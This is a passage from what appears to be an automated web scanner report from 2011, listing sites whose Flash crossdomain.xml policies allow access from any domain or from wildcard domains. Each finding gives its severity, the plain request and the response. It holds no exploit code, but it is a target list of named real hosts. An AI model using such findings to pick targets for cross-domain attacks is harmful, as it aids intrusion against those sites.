Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 09 May 2011 15:35:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.36. http://metrics.csmonitor.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
xserver: www315
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.37. http://metrics.npr.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
xserver: www55
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.38. http://mobile.fox8live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mobile.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:45 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.39. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 09 May 2011 15:36:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.40. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:35:02 GMT
Content-Type: text/xml
Content-Length: 207
Date: Mon, 09 May 2011 15:35:02 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.41. http://radar.weather.gov/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: radar.weather.gov

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 09 Jul 2010 21:50:42 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 167
Content-Type: text/xml
Cache-Control: max-age=11175
Expires: Mon, 09 May 2011 18:42:55 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="SOAPAction"/>
</cross-domain-policy>

3.42. http://s.meebocdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.meebocdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.meebocdn.net

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 03 May 2011 00:23:33 GMT
ETag: "3934951678"
Content-Type: text/xml
Accept-Ranges: bytes
Date: Mon, 09 May 2011 15:35:00 GMT
Server: lighttpd/1.4.19
Cache-Control: private, max-age=604800
Age: 59442
Expires: Sun, 15 May 2011 23:04:18 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="False"/>
<allow-access-from domain="*.meebo.com" secure="False"/>
<allow-http-request-headers-from domain="*.meebo.com" headers="*"/>
<allow-access-from domain="*.meebocdn.net" secure="False"/>
...[SNIP]...

3.43. http://s0.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 09 May 2011 02:46:13 GMT
Expires: Tue, 10 May 2011 02:46:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 46132

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.44. http://secure-us.imrworldwide.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 15:35:19 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.45. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:35:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.46. http://spd.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15b0"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.47. http://speed.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.48. http://stp.fox8live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stp.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stp.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Accept-Ranges: bytes
ETag: "0b66c58755c71:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Content-Length: 121

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.49. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:03 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 12 Apr 2011 21:52:25 GMT
ETag: "5d240b9-c9-4a0bfb522d840"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

3.50. http://t.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:55e"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:59 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

3.51. http://trc.taboolasyndication.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 May 2011 19:38:04 GMT
ETag: "f406f8-199-4a250297d3f00"
Accept-Ranges: bytes
Content-Length: 409
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

3.52. http://usatoday1.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
xserver: www419
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

3.53. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

3.54. http://w10.localadbuy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: w10.localadbuy.com

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:36:58 GMT
Content-Type: application/xml
Content-Length: 340
Last-Modified: Thu, 09 Dec 2010 18:13:51 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies=
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.55. http://widget.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widget.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widget.newsinc.com

Response

HTTP/1.1 200 OK
x-amz-id-2: WG7y2gX1/96nanqwYADUuDtOwvrux+J3B/rD+BbX0FP48UXZR/sEjPQFKLyfXNhP
x-amz-request-id: 9337D374BAA52553
Date: Mon, 09 May 2011 15:37:39 GMT
Last-Modified: Mon, 26 Oct 2009 18:54:37 GMT
ETag: "9a2df4412dfbe178fccafc4915ad186e"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 335
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

3.56. http://wvue.web.entriq.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wvue.web.entriq.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 295
Keep-Alive: timeout=3
Connection: Keep-Alive
Content-Type: text/html

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

3.57. http://www.fox8live.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:54 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n23), rf-ht iad-agg-n23 ( origin)
ETag: "0b66c58755c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:54 GMT
Age: 0
Content-Length: 121
Content-Type: text/xml
Last-Modified: Tue, 20 Feb 2007 15:54:04 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

3.58. http://www.groupon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/xml
Accept-Ranges: bytes
Age: 258768
Date: Mon, 09 May 2011 15:35:34 GMT
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 352
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.59. https://www.groupon.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/xml
Connection: close
Accept-Ranges: bytes
Age: 225292
Last-Modified: Thu, 18 Nov 2010 03:10:16 GMT
Content-Length: 352

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" to-ports="80,443" secure="false" />
...[SNIP]...

3.60. http://xedge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xedge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: xedge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=86400
Content-Length: 268
Content-Type: text/xml
Content-Location: http://xedge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:ddb"
Server: Microsoft-IIS/6.0
X-Server: D2E.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:37:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

3.61. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:28 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 418
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...

3.62. http://ads.bridgetrack.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.bridgetrack.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 810
Content-Type: text/html
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="ads.bridgetrack.com.edgesuite.net" />
   <allow-access-from domain="ads.bri
...[SNIP]...
<allow-access-from domain="sec-ads.bridgetrack.com" />
   <allow-access-from domain="cms-ads.bridgetrack.com" />
   <allow-access-from domain="sec-cms-ads.bridgetrack.com" />
   <allow-access-from domain="travelerssaves.com" />
   <allow-access-from domain="moneyneedsattention.com" />
   <allow-access-from domain="www.moneyneedsattention.com"/>
   <allow-access-from domain="portal.kaplan.edu" />
   <allow-access-from domain="www.portal.kaplan.edu"/>
<allow-access-from domain="*.spongecell.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.myvolvo.com.au" secure="false" />
...[SNIP]...

3.63. http://content.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "befaf11117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:09 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

3.64. http://contextweb.usatoday.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://contextweb.usatoday.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

